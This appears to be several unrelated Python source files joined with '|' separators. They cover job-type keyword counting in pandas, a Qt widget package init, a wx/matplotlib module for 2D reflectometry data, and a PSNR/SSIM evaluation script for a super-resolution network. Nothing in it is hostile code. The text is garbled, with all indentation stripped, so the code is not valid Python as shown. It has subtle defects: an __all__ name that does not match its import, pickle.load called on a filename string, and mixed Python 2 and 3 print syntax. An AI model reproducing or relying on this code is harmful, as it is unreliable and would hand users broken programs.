#df_business = pd.read_pickle("business.txt")
#df_review = pd.read_pickle("review.txt")
#df_student = pd.read_pickle("student.txt")
#df_studentavailability = pd.read_pickle("studentavailability.txt")
#df_university = pd.read_pickle("university.txt")
def count_works(type):
return np.sum(df_stint['type'].str.contains('{}'.format(type), regex=True, case=False))
def create_series_of(series, type):
return series[series.str.contains('{}'.format(type), regex=True, case=False) == True]
def get_list_of_works(series, type):
return create_series_of(series, type).drop_duplicates().tolist()
def delete_from_series(series, list):
return series[~series.isin(list)].dropna()
def flatten(list):
flat_list = []
for sublist in list:
for item in sublist:
flat_list.append(item)
return flat_list
def save_to_excel(df, name):
writer = pd.ExcelWriter('{}.xlsx'.format(name))
df.to_excel(writer)
writer.save()
list_of_works = []
my_series = df_stint['type']
keywords = ['wait', 'run', 'bar', 'cust', 'kitch', 'leaf', 'cloak',
'cashier', 'host', 'clean', 'stock', 'door', 'other', 'errand',
'deliv', 'chef', 'proof', 'assis']
for word in keywords:
list_of_works.append(get_list_of_works(my_series, '{}'.format(word)))
#print(list_of_works[keywords.index(word)])
my_series = delete_from_series(my_series, list_of_works[keywords.index(word)])
print(my_series.value_counts())
#print(my_series.shape[0])
#print(list((2,2)))
w.iter_loop() |
#!/usr/bin/env python
"""Custom Qt Widgets."""
from __future__ import division, print_function
from .playmat import PlayMat
from .viewer import Viewer
__all__ = ["Playmat", "Viewer"]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# check to see if all parameters are set on the command line
# if they are, then don't open GUI interface
from math import *
import sys
#from Tkinter import *
#import tkMessageBox
#import tkFileDialog
#from FileDialog import *
from osrefl.loaders.reduction import *
import osrefl.loaders.reduction as red
from numpy import *
from pylab import imshow,cm,colorbar,hot,show,xlabel,ylabel,connect, plot, figure, draw, axis, gcf
import matplotlib.colors as colors
from matplotlib.widgets import RectangleSelector
from osrefl.viewers.colormap import change_colormap
from matplotlib.axis import XAxis, YAxis
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as Canvas
from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg
import wx
import pickle
from matplotlib.image import FigureImage
from matplotlib.figure import Figure
from osrefl.viewers.zoom_colorbar import zoom_colorbar
from .reduction.cmapmenu import CMapMenu
from matplotlib.cm import get_cmap
import matplotlib.cbook as cbook
import matplotlib
from osrefl.viewers.plot_2d import plot_2d_data
from scipy import ndimage
def load_plottable_2d_data(filename=None):
if filename == None:
dlg = wx.FileDialog(None, "Load plottable_2d_data object from file:", '', "", "*.*", style=wx.FD_OPEN)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
filename = fd + '/' + fn
initobj = pickle.load(filename)
return initobj.instantiate()
def save_plottable_2d_data(obj, filename):
obj.save_to_file(filename)
class p2d_initialization:
"""stores necessary data to recreate a plottable_2d_data object, for pickling"""
def __init__(self, bin_data = None, params=None, creator=None, supervisor=None, plot_data=None, title=''):
self.bin_data = bin_data
self.params = params
self.creator = creator
self.supervisor = supervisor
self.plot_data = plot_data
self.title = title
def instantiate(self):
return plottable_2d_data(self.bin_data, self.params, self.creator, self.supervisor, self.plot_data, self.title)
class plottable_2d_data:
""" container class, for holding an array of 2d data
with normalization and pixel count data
bin_data[:,:,0] = intensity
bin_data[:,:,1] = pixels in bin
bin_data[:,:,2] = monitor count
bin_data[:,:,3] = average (intensity over total monitor count)
also holds a dictionary of parameters with range boundaries and
dimensions.
Includes a plot method that shows a 2D log-intensity plot
with correct axes
Math methods rely on binning being the same for compared data
"""
def __init__(self,
bin_data,
params_in={},
creator = None,
supervisor = None,
plot_data = True,
title = '',
base_data_obj = None,
**kwargs):
#self.param_label = [ 'ymin', 'ymax', 'ysteps', 'xmin', 'xmax', 'xsteps' ]
self.creator = creator # calling object
self.params = params_in
self.show_sliceplots = True #default = on
self.bin_data = bin_data
self.plot_data = plot_data
# bin_data[:,:,0] = raw intensity (summed)
# bin_data[:,:,1] = raw pixels in the bin
# bin_data[:,:,2] = normalization (monitor or time, summed)
# bin_data[:,:,3] = avg. intensity (raw intensity / normalization)
self.data_array = []
self.fig = None
self.slice_y_data = None
self.slice_x_data = None
self.plot = None
self.title = title
self.supervisor = supervisor
self.base_data_obj = base_data_obj
if supervisor:
self.register(supervisor)
#self.xaxis_units = xaxis_units
#self.yaxis_units = yaxis_units
def __getstate__(self):
return (self.bin_data, self.params, self.plot_data, self.title)
def __setstate__(self, state):
self.bin_data, self.params, self.plot_data, self.title = state
def register(self, supervisor):
supervisor.AddPlottable2dData(self, name = self.title, base_data_obj = self.base_data_obj)
#self.number = supervisor.plottable_count
self.supervisor = supervisor
def __del__(self):
if self.area_plot:
self.area_plot.Close()
def copy(self):
new_data = plottable_2d_data(self.bin_data.copy(), self.params, supervisor = self.supervisor, title = self.title)
return new_data
def save_to_file(self, filename = None):
if filename == None:
dlg = wx.FileDialog(None, "Save plottable_2d_data object to file:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
filename = fd + '/' + fn
initobj = p2d_initialization(self.bin_data, self.params, self.creator, self.supervisor, self.plot_data, self.title)
stored_file = open(filename, 'wb')
pickle.dump(initobj, stored_file)
def save2(self, filename = None):
if filename == None:
dlg = wx.FileDialog(None, "Save plottable_2d_data object to file:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
filename = fd + '/' + fn
stored_file = open(filename, 'wb')
pickle.dump(self, stored_file)
stored_file.close()
def __sub__(self, other_data):
if type(other_data) == type(self):
return self.__subtract_otherdataset(other_data)
elif isscalar(other_data):
return self.__subtract_scalar(other_data)
def __subtract_scalar(self, other_data):
new_data = plottable_2d_data(zeros(self.bin_data.shape), self.params, supervisor = self.supervisor, title = '('+self.title+') - ('+str(other_data)+')')
new_data.bin_data = self.bin_data.copy()
new_data.bin_data[:,:,3] -= other_data
return new_data
def __subtract_otherdataset(self, other_data):
if other_data.bin_data.shape == self.bin_data.shape:
if self.check_compatible_binning(other_data):
new_data = plottable_2d_data(zeros(self.bin_data.shape), self.params, supervisor = self.supervisor, title = '('+self.title+') - ('+other_data.title+')')
self_nonzero = (self.bin_data[:,:,1] != 0)
other_nonzero = (other_data.bin_data[:,:,1] != 0)
mask = self_nonzero * other_nonzero
print len(mask)
new_data.bin_data[:,:,3][mask] = self.bin_data[:,:,3][mask] - other_data.bin_data[:,:,3][mask]
new_data.bin_data[:,:,2][mask] = self.bin_data[:,:,2][mask] + other_data.bin_data[:,:,2][mask]
new_data.bin_data[:,:,1][mask] = self.bin_data[:,:,1][mask] + other_data.bin_data[:,:,1][mask]
new_data.bin_data[:,:,0][mask] = self.bin_data[:,:,0][mask] - other_data.bin_data[:,:,0][mask]
return new_data
else:
print("error: datasets are not identically binned")
elif other_data.bin_data.shape[1] == 1:
new_data = plottable_2d_data(zeros(self.bin_data.shape), self.params, supervisor = self.supervisor, title = '('+self.title+') - ('+other_data.title+')')
new_data.bin_data[:,:,0] = self.bin_data[:,:,0] - other_data.bin_data[:,:,0]
new_data.bin_data[:,:,1] = self.bin_data[:,:,1] + other_data.bin_data[:,:,1]
new_data.bin_data[:,:,2] = self.bin_data[:,:,2] + other_data.bin_data[:,:,2]
new_data.bin_data[:,:,3] = self.bin_data[:,:,3] - other_data.bin_data[:,:,3]
return new_data
else:
print("subtraction failed for some reason")
def check_compatible_binning(self, other_data):
compatible = ( other_data.__class__.__name__ == self.__class__.__name__ )
compatible &= ( other_data.params['y_steps'] == self.params['y_steps'] )
compatible &= ( other_data.params['x_steps'] == self.params['x_steps'] )
compatible &= ( other_data.params['x_min'] == self.params['x_min'] )
compatible &= ( other_data.params['y_min'] == self.params['y_min'] )
compatible &= ( other_data.params['x_max'] == self.params['x_max'] )
compatible &= ( other_data.params['y_max'] == self.params['y_max'] )
### compatibility shouldn't depend on unit labels for axes, but uncomment if you want it to.
#compatible &= ( other_data.params['x_units'] == self.params['x_units'] )
#compatible &= ( other_data.params['y_units'] == self.params['y_units'] )
return compatible
def __add__(self, other_data):
if type(other_data) == type(self):
print 'adding two data sets \n'
return self.__add_otherdataset(other_data)
elif isscalar(other_data):
print 'adding scalar to data set\n'
return self.__add_scalar(other_data)
def __add_scalar(self, other_data):
new_data = self.copy()
new_data.bin_data[:,:,3] += other_data
return new_data
def __add_otherdataset(self, other_data):
if self.check_compatible_binning(other_data):
new_data = plottable_2d_data(self.bin_data, self.params, supervisor = self.supervisor, title = '('+self.title+') + ('+other_data.title+')')
new_data.bin_data = self.bin_data + other_data.bin_data
#new_data.bin_data = self.bin_data.copy()
#for j in range(self.params['y_steps']):
#for i in range(self.params['x_steps']):
#new_data.bin_data[i,j,0] = self.bin_data[i,j,0] + other_data.bin_data[i,j,0]
#new_data.bin_data[i,j,1] = self.bin_data[i,j,1] + other_data.bin_data[i,j,1]
#new_data.bin_data[i,j,2] = self.bin_data[i,j,2] + other_data.bin_data[i,j,2]
#new_data.bin_data[i,j,3] = self.bin_data[i,j,3] + other_data.bin_data[i,j,3]
return new_data
else:
print("error: datasets are not identically binned")
return
def __mul__(self, multiplier):
multiplier = float(multiplier)
new_data = plottable_2d_data(self.bin_data, self.params, supervisor = self.supervisor, title = '('+self.title+') * ' + str(multiplier))
new_data.bin_data = self.bin_data.copy()
for j in range(self.params['y_steps']):
for i in range(self.params['x_steps']):
new_data.bin_data[i,j,0] = self.bin_data[i,j,0] * multiplier
new_data.bin_data[i,j,1] = self.bin_data[i,j,1]
new_data.bin_data[i,j,2] = self.bin_data[i,j,2]
new_pixelCount = new_data.bin_data[i,j,1]
if ( new_pixelCount > 0 ):
new_monitorTotal = new_data.bin_data[i,j,2]
new_avg = new_data.bin_data[i,j,0] / double(new_monitorTotal)
else:
new_avg = 0.0
new_data.bin_data[i,j,3] = new_avg
return new_data
#def __div__(self, other_data):
#"""divide one dataset by another - useful for
#dividing by a background, for instance"""
#if not self.check_compatible_binning(other_data):
#print("error: datasets are not identically binned")
#return self
#if not other_data.bin_data[self.bin_data[:,:,0] != 0].min() > 0:
## checking for denominator positive for all data points
#print("error: attempting to divide by zero")
#return self
#else:
#new_data = plottable_2d_data(self.bin_data, self.params)
#new_data.bin_data = self.bin_data.copy()
#for j in range(self.params['y_steps']):
#for i in range(self.params['x_steps']):
#new_data.bin_data[i,j,0] = self.bin_data[i,j,0] / other_data.bin_data[i,j,0]
#new_data.bin_data[i,j,1] = self.bin_data[i,j,1]
#new_data.bin_data[i,j,2] = self.bin_data[i,j,2]
#new_pixelCount = new_data.bin_data[i,j,1]
#if ( new_pixelCount > 0 ):
#new_monitorTotal = new_data.bin_data[i,j,2]
#new_avg = new_data.bin_data[i,j,0] / double(new_monitorTotal)
#else:
#new_avg = 0.0
#new_data.bin_data[i,j,3] = new_avg
#return new_data
def __div__(self, other_data):
"""divide one dataset by another - useful for
dividing by a background, for instance"""
if not self.check_compatible_binning(other_data):
print("error: datasets are not identically binned")
return self
if not other_data.bin_data[:,:,3][self.bin_data[:,:,1] != 0].min() > 0:
# checking for denominator positive for all data points
print("error: attempting to divide by zero")
return self
else:
new_data = self.copy()
new_data.bin_data *= 0
self_nonzero = (self.bin_data[:,:,1] != 0)
other_nonzero = (other_data.bin_data[:,:,1] != 0)
mask = self_nonzero * other_nonzero
new_data.bin_data[:,:,3][mask] = self.bin_data[:,:,3][mask] / other_data.bin_data[:,:,3][mask]
new_data.bin_data[:,:,1][mask] = self.bin_data[:,:,1][mask] + other_data.bin_data[:,:,1][mask]
new_data.bin_data[:,:,2][mask] = self.bin_data[:,:,2][mask] + other_data.bin_data[:,:,2][mask]
new_data.bin_data[:,:,0][mask] = self.bin_data[:,:,0][mask] + other_data.bin_data[:,:,0][mask]
return new_data
def overlap(self, other_data):
new_data = self.copy()
mask = (other_data.bin_data[:,:,1] == 0)
new_data.bin_data[:,:,0][mask] = 0
new_data.bin_data[:,:,1][mask] = 0
new_data.bin_data[:,:,2][mask] = 0
new_data.bin_data[:,:,3][mask] = 0
return new_data
def smooth(self, smoothing_width = 3.0, axis = 1):
working_copy = self.bin_data.copy()
nz_mask = working_copy[:,:,1].nonzero()
working_copy[:,:,0] = ndimage.gaussian_filter1d(working_copy[:,:,0], smoothing_width, axis=axis)
working_copy[:,:,3][nz_mask] = working_copy[:,:,0][nz_mask] / working_copy[:,:,2][nz_mask]
self.bin_data = working_copy
if self.area_plot:
self.area_plot.Destroy()
self.area_plot = self.wxplot()
def save(self, outFileName = None):
if outFileName == None:
dlg = wx.FileDialog(None, "Save 2d data as:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
outFileName = fd + '/' + fn
outFile = open(outFileName, 'w')
# write header: parameter list, then column headers, then data.
outFile.write("#" + str(self.params) + "\n")
outFile.write("x\ty\tI/monitor\tI_0\n")
y_max = self.params['y_max']
y_min = self.params['y_min']
y_steps = self.params['y_steps']
y_units = self.params['y_units']
x_max = self.params['x_max']
x_min = self.params['x_min']
x_steps = self.params['x_steps']
x_units = self.params['x_units']
xStepSize = ( y_max - y_min ) / y_steps
yStepSize = ( x_max - x_min ) / x_steps
yArray = arange(y_steps, dtype='float') / y_steps * (y_max - y_min) + y_min
xArray = arange(x_steps, dtype='float') / x_steps * (x_max - x_min) + x_min
for i in range(x_steps):
for j in range(y_steps):
x = xArray[i]
y = yArray[j]
I_0 = self.bin_data[i,j,0]
avg = self.bin_data[i,j,3]
outFile.write(str(x) + "\t" + str(y) + "\t")
if ( avg > 0.0 ):
outFile.write(str(avg) + "\t" + str(I_0))
else:
outFile.write('-0\t-0')
outFile.write('\n')
outFile.close()
return
def onselect(self, eclick, erelease):
x_range = [eclick.xdata, erelease.xdata]
y_range = [eclick.ydata, erelease.ydata]
ax = eclick.inaxes
self.sliceplot(x_range, y_range, ax=ax)
print 'sliceplot([%f,%f],[%f,%f])' % (x_range[0],x_range[1],y_range[0],y_range[1])
def sliceplot(self, x_range, y_range, ax = None):
"""sum along x and z within the box defined by qX- and qZrange.
sum along qx is plotted to the right of the data,
sum along qz is plotted below the data.
Transparent white rectangle is overlaid on data to show summing region"""
x, slice_y_data, y, slice_x_data = self.do_xy_slice(x_range, y_range)
self.x = x
self.slice_y_data = slice_y_data
self.y = y
self.slice_x_data = slice_x_data
self.slice_xrange = x_range
self.slice_yrange = y_range
if self.area_plot:
self.area_plot.show_slice_overlay(x_range, y_range, x, slice_y_data, y, slice_x_data)
def do_xy_slice(self, x_range, y_range):
""" slice up the data, once along x and once along z.
returns 4 arrays: a y-axis for the x data,
an x-axis for the y data."""
params = self.params
print 'doing xy slice'
data = self.bin_data[:,:,3].copy()
pixels = self.bin_data[:,:,1]
# zero out any pixels in the sum that have zero in the pixel count:
data[pixels == 0] = 0
normalization_matrix = ones(pixels.shape)
normalization_matrix[pixels == 0] = 0
x_min = min(x_range)
x_max = max(x_range)
y_min = min(y_range)
y_max = max(y_range)
x_size,y_size = data.shape
global_x_range = (params['x_max'] - params['x_min'])
global_y_range = (params['y_max'] - params['y_min'])
x_pixel_min = round( (x_min - params['x_min']) / global_x_range * x_size )
x_pixel_max = round( (x_max - params['x_min']) / global_x_range * x_size )
y_pixel_min = round( (y_min - params['y_min']) / global_y_range * y_size )
y_pixel_max = round( (y_max - params['y_min']) / global_y_range * y_size )
#correct any sign switches:
if (x_pixel_min > x_pixel_max):
new_min = x_pixel_max
x_pixel_max = x_pixel_min
x_pixel_min = new_min
if (y_pixel_min > y_pixel_max):
new_min = y_pixel_max
y_pixel_max = y_pixel_min
y_pixel_min = new_min
new_x_min = x_pixel_min / x_size * global_x_range + params['x_min']
new_x_max = x_pixel_max / x_size * global_x_range + params['x_min']
new_y_min = y_pixel_min / y_size * global_y_range + params['y_min']
new_y_max = y_pixel_max / y_size * global_y_range + params['y_min']
x_pixel_min = int(x_pixel_min)
x_pixel_max = int(x_pixel_max)
y_pixel_min = int(y_pixel_min)
y_pixel_max = int(y_pixel_max)
y_norm_factor = sum(normalization_matrix[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=1)
x_norm_factor = sum(normalization_matrix[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=0)
# make sure the normalization has a minimum value of 1 everywhere,
# to avoid divide by zero errors:
y_norm_factor[y_norm_factor == 0] = 1
x_norm_factor[x_norm_factor == 0] = 1
slice_y_data = sum(data[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=1) / y_norm_factor
slice_x_data = sum(data[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=0) / x_norm_factor
#slice_y_data = slice_y_data
#slice_x_data = slice_x_data
x_vals = arange(slice_y_data.shape[0], dtype = 'float') / slice_y_data.shape[0] * (new_x_max - new_x_min) + new_x_min
y_vals = arange(slice_x_data.shape[0], dtype = 'float') / slice_x_data.shape[0] * (new_y_max - new_y_min) + new_y_min
return x_vals, slice_y_data, y_vals, slice_x_data
def log_lin_select(self,event):
if not (isinstance(event.artist, XAxis) or isinstance(event.artist, YAxis)):
return
ax = event.artist.axes
label = ax.get_label()
if label == 'sz':
scale = ax.get_yscale()
if scale == 'log':
ax.set_yscale('linear')
ax.figure.canvas.draw()
elif scale == 'linear':
ax.set_yscale('log')
ax.figure.canvas.draw()
elif label == 'sx':
scale = ax.get_xscale()
if scale == 'log':
ax.set_xscale('linear')
ax.figure.canvas.draw()
elif scale == 'linear':
ax.set_xscale('log')
ax.figure.canvas.draw()
return
def toggle_selector(self, event):
print ' Key pressed.'
if event.key in ['C', 'c']:
print 'change colormap.'
ax = event.inaxes
change_colormap(ax.images[0])
if event.key in ['Q', 'q'] and self.RS.active:
print ' RectangleSelector deactivated.'
self.RS.set_active(False)
if event.key in ['A', 'a'] and not self.RS.active:
print ' RectangleSelector activated.'
self.RS.set_active(True)
def save_slice(self, outFileName, header = ""):
outFile = open(outFileName, 'w')
outFile.write(header)
if not (self.slice_qx_data == None):
for i in range(self.slice_qx_data.shape[0]):
x = self.qz_vals[i]
y = self.slice_qx_data[i]
outFile.write(str(x) + "\t" + str(y) + "\n")
outFile.close()
print('saved qx slice in %s' % (outFileName))
return
def save_x_slice(self, event=None, outFileName=None):
if outFileName == None:
dlg = wx.FileDialog(None, "Save 2d data as:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
outFileName = fd + '/' + fn
outFile = open(outFileName, 'w')
outFile.write('#'+self.title+'\n')
outFile.write('#xmin: ' + str(self.slice_xrange[0]) + '\n')
outFile.write('#xmax: ' + str(self.slice_xrange[1]) + '\n')
outFile.write('#ymin: ' + str(self.slice_yrange[0]) + '\n')
outFile.write('#ymax: ' + str(self.slice_yrange[1]) + '\n')
outFile.write("#y\tslice_x_data\n")
if not (self.slice_x_data == None):
for i in range(self.slice_x_data.shape[0]):
x = self.y[i]
y = self.slice_x_data[i]
outFile.write(str(x) + "\t" + str(y) + "\n")
outFile.close()
print('saved x slice in %s' % (outFileName))
return
def save_y_slice(self, event=None, outFileName=None):
if outFileName == None:
dlg = wx.FileDialog(None, "Save 2d data as:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
outFileName = fd + '/' + fn
outFile = open(outFileName, 'w')
outFile.write('#'+self.title+'\n')
outFile.write('#xmin: ' + str(self.slice_xrange[0]) + '\n')
outFile.write('#xmax: ' + str(self.slice_xrange[1]) + '\n')
outFile.write('#ymin: ' + str(self.slice_yrange[0]) + '\n')
outFile.write('#ymax: ' + str(self.slice_yrange[1]) + '\n')
outFile.write("#x\tslice_y_data\n")
if not (self.slice_y_data == None):
for i in range(self.slice_y_data.shape[0]):
x = self.x[i]
y = self.slice_y_data[i]
outFile.write(str(x) + "\t" + str(y) + "\n")
outFile.close()
print('saved y slice in %s' % (outFileName))
return
def plot_qx_slice(self, label = '', figNum = None):
if figNum:
fig = figure(figNum)
else:
fig = figure()
figNum = fig.number
plot(self.qz_vals, self.slice_qx_data, label = label)
return
def plot_qz_slice(self, label = '', figNum = None):
if figNum:
fig = figure(figNum)
else:
fig = figure()
figNum = fig.number
plot(self.qx_vals, self.slice_qz_data, label = label)
return
def logplot(self, show_sliceplots=True):
from zoom_colorbar import zoom_colorbar
x_min = self.params['x_min']
x_max = self.params['x_max']
y_min = self.params['y_min']
y_max = self.params['y_max']
self.show_data = zeros((self.params['x_steps'],self.params['y_steps']))
self.minimum_intensity = inf
for j in range(self.params['y_steps']):
for i in range(self.params['x_steps']):
avg = self.bin_data[i,j,3]
if avg > 0.0:
self.show_data[i,j] = avg
else:
self.show_data[i,j] = 0.0
if (avg < self.minimum_intensity and avg > 0):
self.minimum_intensity = avg
#self.show_data = transpose(log(self.show_data + self.minimum_intensity / 2.0))
fig = figure()
self.fig = fig
connect('pick_event', self.log_lin_select)
if show_sliceplots:
ax = fig.add_subplot(221, label='qxqz_plot')
fig.sx = fig.add_subplot(222, label='sx', picker=True)
fig.sx.xaxis.set_picker(True)
fig.sx.yaxis.set_picker(True)
fig.sz = fig.add_subplot(223, label='sz', picker=True)
fig.sz.xaxis.set_picker(True)
fig.sz.yaxis.set_picker(True)
self.RS = RectangleSelector(ax, self.onselect, drawtype='box', useblit=True)
fig.slice_overlay = None
else:
ax = fig.add_subplot(111, label='qxqz_plot')
fig.ax = ax
ax.set_title(self.params['description'])
connect('key_press_event', self.toggle_selector)
transformed_show_data = transpose(log(self.show_data + self.minimum_intensity / 2.0))
im = ax.imshow(transformed_show_data, interpolation='nearest', aspect='auto', origin='lower',cmap=cm.jet, extent=(x_min,x_max,y_min,y_max))
fig.im = im
ax.set_xlabel(self.xlabel)
ax.set_ylabel(self.ylabel)
zoom_colorbar(im)
figure(fig.number)
fig.canvas.draw()
return im
def plot(self, show_sliceplots=True):
from zoom_colorbar import zoom_colorbar
x_min = self.params['x_min']
x_max = self.params['x_max']
y_min = self.params['y_min']
y_max = self.params['y_max']
self.show_data = zeros((self.params['x_steps'],self.params['y_steps']))
self.minimum_intensity = inf
for j in range(self.params['y_steps']):
for i in range(self.params['x_steps']):
avg = self.bin_data[i,j,3]
self.show_data[i,j] = avg
if (avg < self.minimum_intensity and avg > 0):
self.minimum_intensity = avg
fig = figure()
self.fig = fig
connect('pick_event', self.log_lin_select)
if show_sliceplots:
ax = fig.add_subplot(221, label='qxqz_plot')
fig.sx = fig.add_subplot(222, label='sx', picker=True)
fig.sx.xaxis.set_picker(True)
fig.sx.yaxis.set_picker(True)
fig.sz = fig.add_subplot(223, label='sz', picker=True)
fig.sz.xaxis.set_picker(True)
fig.sz.yaxis.set_picker(True)
self.RS = RectangleSelector(ax, self.onselect, drawtype='box', useblit=True)
fig.slice_overlay = None
else:
ax = fig.add_subplot(111, label='qxqz_plot')
fig.ax = ax
ax.set_title(self.params['description'])
connect('key_press_event', self.toggle_selector)
transformed_show_data = transpose(self.show_data)
im = ax.imshow(transformed_show_data, interpolation='nearest', aspect='auto', origin='lower',cmap=cm.hot, extent=(x_min,x_max,y_min,y_max))
fig.im = im
ax.set_xlabel('Qx (inv Angstroms)')
ax.set_ylabel('Qz (inv Angstroms)')
#fig.colorbar(im, ax=ax)
zoom_colorbar(im)
#im.set_cmap(cm.hot)
#fig.show()
figure(fig.number)
draw()
return im
def wxplot(self, destroy_older = True, scale = 'log'):
#use the custom WX Frame defined below, with custom toolbar including slice button
x_min = self.params['x_min']
x_max = self.params['x_max']
y_min = self.params['y_min']
y_max = self.params['y_max']
self.show_data = self.bin_data[:,:,3].copy()
pixel_mask = self.bin_data[:,:,1].copy()
extent=[x_min,x_max,y_min,y_max]
#from plot_2d3 import plot_2d_data
plot_title = self.params['description']
x_label = self.params['x_units']
y_label = self.params['y_units']
frame = offspec_plot_2d_data(self.show_data, extent, self, scale = scale, pixel_mask = pixel_mask, window_title = self.title, plot_title = plot_title, x_label = x_label, y_label = y_label)
frame.Show()
self.area_plot = frame
return frame
class offspec_plot_2d_data(plot_2d_data):
"""overriding the context menus to add interaction with other objects known to supervisor"""
def get_all_plot_2d_instances(self):
"""get all other plots that are open (from supervisor?)"""
if self.caller == None:
return [], []
supervisor = self.caller.supervisor
instances = []
instance_names = []
#for dataset in supervisor.rebinned_data_objects:
##instances.append(dataset)
#for subkey in dataset.__dict__.keys():
#if isinstance(dataset.__dict__[subkey], plottable_2d_data):
##print('plottable_2d_data yes')
#instance_names.append(str(dataset.number) + ': ' + subkey + ': ' + dataset.description)
#instances.append(dataset.__dict__[subkey])
for plottable in supervisor.plottable_2d_data_objects:
if hasattr(plottable, 'area_plot'):
instances.append(plottable.area_plot)
instance_names.append(plottable.title + ': ' + plottable.params['description'])
return instances, instance_names
def other_plots_menu(self):
other_plots, other_plot_names = self.get_all_plot_2d_instances()
other_menu = wx.Menu()
for op in other_plot_names:
item = other_menu.Append(wx.ID_ANY, op, op)
return other_menu
def other_plots_dialog(self):
other_plots, other_plot_names = self.get_all_plot_2d_instances()
#selection_num = wx.GetSingleChoiceIndex('Choose other plot', '', other_plot_names)
dlg = wx.SingleChoiceDialog(None, 'Choose other plot', '', other_plot_names)
dlg.SetSize(wx.Size(640,480))
if dlg.ShowModal() == wx.ID_OK:
selection_num=dlg.GetSelection()
dlg.Destroy()
return other_plots[selection_num]
def dummy(self, evt):
print 'the event is: ' + str(evt)
def area_context(self, mpl_mouseevent, evt):
area_popup = wx.Menu()
item1 = area_popup.Append(wx.ID_ANY,'&Grid on/off', 'Toggle grid lines')
wx.EVT_MENU(self, item1.GetId(), self.OnGridToggle)
cmapmenu = CMapMenu(self, callback = self.OnColormap, mapper=self.mapper, canvas=self.canvas)
item2 = area_popup.Append(wx.ID_ANY,'&Toggle log/lin', 'Toggle log/linear scale')
wx.EVT_MENU(self, item2.GetId(), lambda evt: self.toggle_log_lin(mpl_mouseevent))
item3 = area_popup.AppendMenu(wx.ID_ANY, "Colourmaps", cmapmenu)
#other_plots, other_plot_names = self.get_all_plot_2d_instances()
#if not (other_plot_names == []):
#other_menu = wx.Menu()
#for op in other_plot_names:
#item = other_menu.Append(wx.ID_ANY, op, op)
#other_menu = self.other_plots_menu()
item4 = area_popup.Append(wx.ID_ANY, "copy intens. scale from", '')
wx.EVT_MENU(self, item4.GetId(), lambda evt: self.copy_intensity_range_from(self.other_plots_dialog()) )
item5 = area_popup.Append(wx.ID_ANY, "copy slice region from", '')
wx.EVT_MENU(self, item5.GetId(), lambda evt: self.sliceplot(self.other_plots_dialog().slice_xy_range) )
self.PopupMenu(area_popup, evt.GetPositionTuple())
|
import torch
from torch.autograd import Variable
import numpy as np
import time, math, glob
import scipy.io as sio
import matplotlib.pyplot as plt
from ssim import ssim
from lapsrn import LapSrnMS
def PSNR(pred, gt, shave_border=0):
height, width = pred.shape[:2]
pred = pred[shave_border:height - shave_border, shave_border:width - shave_border]
gt = gt[shave_border:height - shave_border, shave_border:width - shave_border]
imdff = pred - gt
rmse = math.sqrt(np.mean(imdff ** 2))
if rmse == 0:
return 100
return 20 * math.log10(255.0 / rmse)
def SSIM(pred, gt, shave_border=0):
height, width = pred.shape[:2]
pred = pred[shave_border:height - shave_border, shave_border:width - shave_border]
gt = gt[shave_border:height - shave_border, shave_border:width - shave_border]
return np.mean(ssim(pred, gt))
if __name__ == '__main__':
cuda = True
checkpoint = torch.load('best.pt')
model = LapSrnMS(5, 5, 4)
model.load_state_dict(checkpoint['state_dict'])
model = model.to('cuda:2')
model.eval()
for scale in [2, 4]:
for dataset in glob.glob('dataset/mat/*/'):
image_list = glob.glob('{}{}x/*.mat'.format(dataset, scale))
avg_psnr_predicted = 0.0
avg_psnr_bicubic = 0.0
avg_ssim_predicted = 0.0
avg_ssim_bicubic = 0.0
avg_elapsed_time = 0.0
for image_name in image_list:
# print("Processing ", image_name)
mat = sio.loadmat(image_name)
im_gt_y = mat['im_gt_y']
im_b_y = mat['im_b_y']
im_l_y = mat['im_l_y']
im_rgb = mat['im_rgb']
im_gt_y = im_gt_y.astype(float)
im_b_y = im_b_y.astype(float)
im_l_y = im_l_y.astype(float)
im_rgb = im_rgb.astype(float)
psnr_bicubic = PSNR(im_gt_y, im_b_y, shave_border=scale)
avg_psnr_bicubic += psnr_bicubic
avg_ssim_bicubic += SSIM(im_gt_y, im_b_y, shave_border=scale)
im_input = im_l_y / 255.
im_rgb = im_rgb / 255.
im_input = Variable(torch.from_numpy(im_input).float()).view(1, -1, im_input.shape[0], im_input.shape[1])
im_rgb = Variable(torch.from_numpy(im_rgb).float()).reshape(1, -1, im_rgb.shape[0], im_rgb.shape[1])
if cuda:
im_input = im_input.to('cuda:2')
im_rgb = im_rgb.to('cuda:2')
else:
model = model.cpu()
start_time = time.time()
if scale == 2:
HR_4x, _ = model(im_rgb, im_input)
if scale == 4:
_, HR_4x = model(im_rgb, im_input)
elapsed_time = time.time() - start_time
avg_elapsed_time += elapsed_time
HR_4x = HR_4x.cpu()
im_h_y = HR_4x.data[0].numpy().astype(np.float32)
im_h_y = im_h_y * 255.
im_h_y[im_h_y < 0] = 0
im_h_y[im_h_y > 255.] = 255.
im_h_y = im_h_y[0, :, :]
psnr_predicted = PSNR(im_gt_y, im_h_y, shave_border=scale)
avg_psnr_predicted += psnr_predicted
avg_ssim_predicted += SSIM(im_gt_y, im_h_y, shave_border=scale)
print("Scale=", scale)
print("Dataset=", dataset)
print("PSNR_predicted=", avg_psnr_predicted / len(image_list))
print("PSNR_bicubic=", avg_psnr_bicubic / len(image_list))
